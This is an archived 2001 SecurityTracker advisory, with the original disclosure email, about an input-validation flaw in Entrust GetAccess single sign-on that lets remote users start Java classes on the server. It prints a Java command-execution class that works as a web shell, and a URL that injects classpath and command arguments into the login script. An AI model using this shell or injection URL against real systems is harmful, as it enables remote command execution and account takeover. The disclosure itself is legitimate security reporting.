SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Security)  >   GetAccess Vendors:   Entrust
Entrust GetAccess Single Sign-on Software Lets Remote Users Execute Java Programs on the Server
SecurityTracker Alert ID:  1002103
SecurityTracker URL:  http://securitytracker.com/id/1002103
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 28 2001
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in Entrust's GetAccess signle sign-on software that allows remote users to start Java programs that reside on the GetAccess server.

The vulnerability is reportedly due to the lack of input validation in the login modules.

To trigger this vulnerability, the remote user must identify an exploitable GetAccess Java class (a class that accepts input parameters). Then, the remote user can access a URL to cause the the Java program to be executed.

An example URL that will execute the 'cmd.class' Java class (which is not part of Entrust's GetAccess) is:

http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

When the remote user access this URL, the GetAccess server will run "/whereever/cmd.class" and execute "/bin/ls -alsi".
Impact:   A remote user can start Java programs that reside on the GetAccess server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.entrust.com/getaccess/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   UNIX (Solaris - SunOS), Windows (NT)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Entrust Releases Fix) Re: Entrust GetAccess Single Sign-on Software Lets Remote Users Execute Java Programs on the Server   ("MARTAK,PAVEL (HP-Czechia,ex1)" <pavel_martak@hp.com>)
The vendor has released a fix.


 Source Message Contents
Date:  Fri, 27 Jul 2001 11:33:54
Subject:  Entrust - getAccess



hola friends,

getAccess[tm] is used as a single-sign-on system often used for large 
internet-portals.

--- snip (http://www.entrust.com) ---

Entrust GetAccess[tm] offers the most comprehensive solution for 
consistently deploying and enforcing
basic and enhanced security across online applications, from Web browsers, 
to enterprise applications and
legacy database systems.

--- snip ---

problem description:

due to missing input-validation it is possible to run(start) java-programs 
on the "getaccess"-machine.
combined with public accessibly uploads or any other possibility to create 
class-files on the server this vulnerability c
ould be used to run arbitrary system commands on the target machine( or 
change getAccess parameters and steal any user ac
count you want BTW).

it should also be possible(but not proven yet) to exploit default-,install- 
or demo classes within Java or getAccess whic
h would make the file-upload(creation) part unneeded!
(uninstall.class is very likely an effective DOS)


Example:

find exploitable getAccess-class(one which accepts params!) or upload a 
"command" programm:

--- cut here (example cmd.java) ---

import java.io.*;
public class cmd {
public static void main(String args[]) {
s = null;
try {
Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]);
BufferedReader stdInput = new BufferedReader(new 
InputStreamReader(p.getInputStream()));
BufferedReader stdError = new BufferedReader(new 
InputStreamReader(p.getErrorStream()));
System.out.println("Content-type: text/html\n\n");
while ((s = stdInput.readLine()) != null) { System.out.println(s); }
while ((s = stdError.readLine()) != null) { System.out.println(s); }
System.exit(0);
}
catch (IOException e) { e.printStackTrace(); System.exit(-1); }
} }

--- cut here ---


later then .. a http-request to :

http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

.. will run "/whereever/cmd.class" and execute "/bin/ls -alsi"


Summary:

object: *.gas.bat  (all the getAccess cgi-shell-scripts)
class: input validation
remote: yes

vendor: has been informed with a separate e-mail ( entrust@entrust.com )


(and BTW. i would NEVER EVER recommand to use shell-scripts for 
authentication purposes!)


nice day,


rC

rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com/security/








_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC